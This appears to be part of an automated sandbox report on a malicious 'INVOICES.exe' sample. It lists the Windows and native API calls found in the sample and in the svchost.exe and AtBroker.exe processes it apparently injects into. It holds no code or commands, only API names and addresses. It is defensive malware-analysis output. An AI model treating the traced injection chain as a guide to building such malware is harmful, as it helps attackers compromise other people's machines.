Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC668 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W, | 0_2_007BC668
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC8F9 NtdllDialogWndProc_W, | 0_2_007BC8F9
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC8CA NtdllDialogWndProc_W, | 0_2_007BC8CA
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC973 NtdllDialogWndProc_W, | 0_2_007BC973
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC928 NtdllDialogWndProc_W, | 0_2_007BC928
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC9A8 ClientToScreen,NtdllDialogWndProc_W, | 0_2_007BC9A8
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BCAE6 GetWindowLongW,NtdllDialogWndProc_W, | 0_2_007BCAE6
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BCB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_007BCB26
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00731290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient, | 0_2_00731290
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00731287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74B1C8D0,NtdllDialogWndProc_W, | 0_2_00731287
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BD422 NtdllDialogWndProc_W, | 0_2_007BD422
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BD4A8 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W, | 0_2_007BD4A8
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073167D NtdllDialogWndProc_W, | 0_2_0073167D
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007316DE GetParent,NtdllDialogWndProc_W, | 0_2_007316DE
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007316B5 NtdllDialogWndProc_W, | 0_2_007316B5
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BD7F6 NtdllDialogWndProc_W, | 0_2_007BD7F6
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073189B NtdllDialogWndProc_W, | 0_2_0073189B
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BBCC7 NtdllDialogWndProc_W,CallWindowProcW, | 0_2_007BBCC7
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BBFF6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, | 0_2_007BBFF6
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BBF9A NtdllDialogWndProc_W, | 0_2_007BBF9A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C5C3 NtClose, | 2_2_0042C5C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B60 NtClose,LdrInitializeThunk, | 2_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, | 2_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk, | 2_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674340 NtSetContextThread, | 2_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674650 NtSuspendThread, | 2_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BE0 NtQueryValueKey, | 2_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BF0 NtAllocateVirtualMemory, | 2_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BA0 NtEnumerateValueKey, | 2_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B80 NtQueryInformationFile, | 2_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AF0 NtWriteFile, | 2_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AD0 NtReadFile, | 2_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AB0 NtWaitForSingleObject, | 2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F60 NtCreateProcessEx, | 2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F30 NtCreateSection, | 2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FE0 NtCreateFile, | 2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FA0 NtQuerySection, | 2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FB0 NtResumeThread, | 2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F90 NtProtectVirtualMemory, | 2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E30 NtWriteVirtualMemory, | 2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EE0 NtQueueApcThread, | 2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, | 2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E80 NtReadVirtualMemory, | 2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D30 NtUnmapViewOfSection, | 2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D00 NtSetInformationFile, | 2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D10 NtMapViewOfSection, | 2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DD0 NtDelayExecution, | 2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DB0 NtEnumerateKey, | 2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C60 NtCreateKey, | 2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C70 NtFreeVirtualMemory, | 2_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C00 NtQueryInformationProcess, | 2_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CF0 NtOpenProcess, | 2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CC0 NtQueryVirtualMemory, | 2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CA0 NtQueryInformationToken, | 2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673010 NtOpenDirectoryObject, | 2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673090 NtSetValueKey, | 2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036739B0 NtGetContextThread, | 2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D70 NtOpenThread, | 2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D10 NtOpenProcessToken, | 2_2_03673D10
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04764650 NtSuspendThread,LdrInitializeThunk, | 5_2_04764650
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04764340 NtSetContextThread,LdrInitializeThunk, | 5_2_04764340
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762C70 NtFreeVirtualMemory,LdrInitializeThunk, | 5_2_04762C70
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762C60 NtCreateKey,LdrInitializeThunk, | 5_2_04762C60
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762CA0 NtQueryInformationToken,LdrInitializeThunk, | 5_2_04762CA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762D30 NtUnmapViewOfSection,LdrInitializeThunk, | 5_2_04762D30
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762D10 NtMapViewOfSection,LdrInitializeThunk, | 5_2_04762D10
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762DF0 NtQuerySystemInformation,LdrInitializeThunk, | 5_2_04762DF0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762DD0 NtDelayExecution,LdrInitializeThunk, | 5_2_04762DD0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762EE0 NtQueueApcThread,LdrInitializeThunk, | 5_2_04762EE0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762E80 NtReadVirtualMemory,LdrInitializeThunk, | 5_2_04762E80
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762F30 NtCreateSection,LdrInitializeThunk, | 5_2_04762F30
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762FE0 NtCreateFile,LdrInitializeThunk, | 5_2_04762FE0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762FB0 NtResumeThread,LdrInitializeThunk, | 5_2_04762FB0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762AF0 NtWriteFile,LdrInitializeThunk, | 5_2_04762AF0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762AD0 NtReadFile,LdrInitializeThunk, | 5_2_04762AD0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762B60 NtClose,LdrInitializeThunk, | 5_2_04762B60
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 5_2_04762BF0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762BE0 NtQueryValueKey,LdrInitializeThunk, | 5_2_04762BE0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762BA0 NtEnumerateValueKey,LdrInitializeThunk, | 5_2_04762BA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047635C0 NtCreateMutant,LdrInitializeThunk, | 5_2_047635C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047639B0 NtGetContextThread,LdrInitializeThunk, | 5_2_047639B0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762C00 NtQueryInformationProcess, | 5_2_04762C00
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762CF0 NtOpenProcess, | 5_2_04762CF0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762CC0 NtQueryVirtualMemory, | 5_2_04762CC0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762D00 NtSetInformationFile, | 5_2_04762D00
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762DB0 NtEnumerateKey, | 5_2_04762DB0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762E30 NtWriteVirtualMemory, | 5_2_04762E30
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762EA0 NtAdjustPrivilegesToken, | 5_2_04762EA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762F60 NtCreateProcessEx, | 5_2_04762F60
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762FA0 NtQuerySection, | 5_2_04762FA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762F90 NtProtectVirtualMemory, | 5_2_04762F90
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762AB0 NtWaitForSingleObject, | 5_2_04762AB0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04762B80 NtQueryInformationFile, | 5_2_04762B80
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04763010 NtOpenDirectoryObject, | 5_2_04763010
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04763090 NtSetValueKey, | 5_2_04763090
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04763D70 NtOpenThread, | 5_2_04763D70
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04763D10 NtOpenProcessToken, | 5_2_04763D10
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_003691C0 NtCreateFile, | 5_2_003691C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00369330 NtReadFile, | 5_2_00369330
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00369420 NtDeleteFile, | 5_2_00369420
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_003694C0 NtClose, | 5_2_003694C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00369620 NtAllocateVirtualMemory, | 5_2_00369620
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0079A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, | 0_2_0079A279
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00788638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74CA5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle, | 0_2_00788638
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00795264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_00795264
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073E800 | 0_2_0073E800
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075DAF5 | 0_2_0075DAF5
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073E060 | 0_2_0073E060
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00744140 | 0_2_00744140
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00752345 | 0_2_00752345
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007B0465 | 0_2_007B0465
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00766452 | 0_2_00766452
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007625AE | 0_2_007625AE
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075277A | 0_2_0075277A
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00746841 | 0_2_00746841
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007B08E2 | 0_2_007B08E2
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00748968 | 0_2_00748968
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00798932 | 0_2_00798932
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0078E928 | 0_2_0078E928
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0076890F | 0_2_0076890F
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007669C4 | 0_2_007669C4
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075CCA1 | 0_2_0075CCA1
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00766F36 | 0_2_00766F36
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007470FE | 0_2_007470FE
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00743190 | 0_2_00743190
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00731287 | 0_2_00731287
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075F359 | 0_2_0075F359
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00753307 | 0_2_00753307
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00751604 | 0_2_00751604
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00745680 | 0_2_00745680
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00757813 | 0_2_00757813
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007458C0 | 0_2_007458C0
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00751AF8 | 0_2_00751AF8
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00769C35 | 0_2_00769C35
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073FE40 | 0_2_0073FE40
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007B7E0D | 0_2_007B7E0D
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075BF26 | 0_2_0075BF26
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00751F10 | 0_2_00751F10
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_009435F0 | 0_2_009435F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418643 | 2_2_00418643
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041687E | 2_2_0041687E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416883 | 2_2_00416883
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410163 | 2_2_00410163
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E1E3 | 2_2_0040E1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004029F7 | 2_2_004029F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040224D | 2_2_0040224D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402250 | 2_2_00402250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402A00 | 2_2_00402A00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404225 | 2_2_00404225
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EBC3 | 2_2_0042EBC3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402E80 | 2_2_00402E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF43 | 2_2_0040FF43
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF3A | 2_2_0040FF3A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 | 2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 | 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037003E6 | 2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 | 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C02C0 | 2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C8158 | 2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630100 | 2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 | 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F81CC | 2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F41A2 | 2_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037001AA | 2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 | 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 | 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664750 | 2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C7C0 | 2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365C6E0 | 2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640535 | 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03700591 | 2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F2446 | 2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4420 | 2_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EE4F6 | 2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 | 2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F6BD7 | 2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 | 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 | 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 | 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370A9A6 | 2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364A840 | 2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 | 2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E8F0 | 2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036268B8 | 2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B4F40 | 2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03682F28 | 2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660F30 | 2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E2F30 | 2_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364CFE0 | 2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632FC8 | 2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BEFA0 | 2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640E59 | 2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEE26 | 2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEEDB | 2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652E90 | 2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FCE93 | 2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364AD00 | 2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DCD1F | 2_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363ADE0 | 2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03658DBF | 2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640C00 | 2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630CF2 | 2_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0CB5 | 2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D34C | 2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F132D | 2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0368739A | 2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E12ED | 2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365B2C0 | 2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036452A0 | 2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367516C | 2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362F172 | 2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B16B | 2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364B1B0 | 2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F70E9 | 2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF0E0 | 2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF0CC | 2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036470C0 | 2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF7B0 | 2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03685630 | 2_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F16CC | 2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7571 | 2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037095C3 | 2_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD5B0 | 2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631460 | 2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF43F | 2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFB76 | 2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B5BF0 | 2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367DBF9 | 2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365FB80 | 2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B3A6C | 2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFA49 | 2_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E2446
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D4420
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047DE4F6
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04730535
